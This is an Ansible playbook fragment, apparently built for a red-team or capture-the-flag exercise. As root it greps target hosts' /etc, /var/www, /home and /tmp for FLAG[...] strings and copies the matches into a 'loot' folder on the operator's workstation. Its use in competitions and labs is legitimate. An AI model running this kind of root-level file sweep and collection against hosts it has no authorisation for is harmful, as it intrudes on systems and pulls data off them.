---
- name: Create local loot directory
  delegate_to: localhost
  file:
    path: "{{ playbook_dir }}/loot/{{ inventory_hostname }}"
    state: directory
    mode: '0755'
  become: no

- name: Targeted Flag Extraction
  become: yes
  shell: |
    # Removed -h to show filenames. Scans common flag locations.
    grep -rEo "FLAG\[[^]]+\]" /etc /var/www /home /tmp 2>/dev/null
  register: fs_matches
  failed_when: false
  changed_when: false

- name: Save findings to Red Team Workstation
  delegate_to: localhost
  copy:
    content: |
      === TARGETED FLAG REPORT: {{ inventory_hostname }} ===
      [FILE PATH : FLAG STRING]
      {{ fs_matches.stdout if fs_matches.stdout != "" else "No valid flags found." }}
    dest: "{{ playbook_dir }}/loot/{{ inventory_hostname }}/flags_report.txt"
  become: no

- name: LIVE FLAG ALERT
  debug:
    msg: 
      - "Location : Flag Content"
      - "{{ fs_matches.stdout_lines | default(['No flags found']) }}"
  when: fs_matches.stdout != ""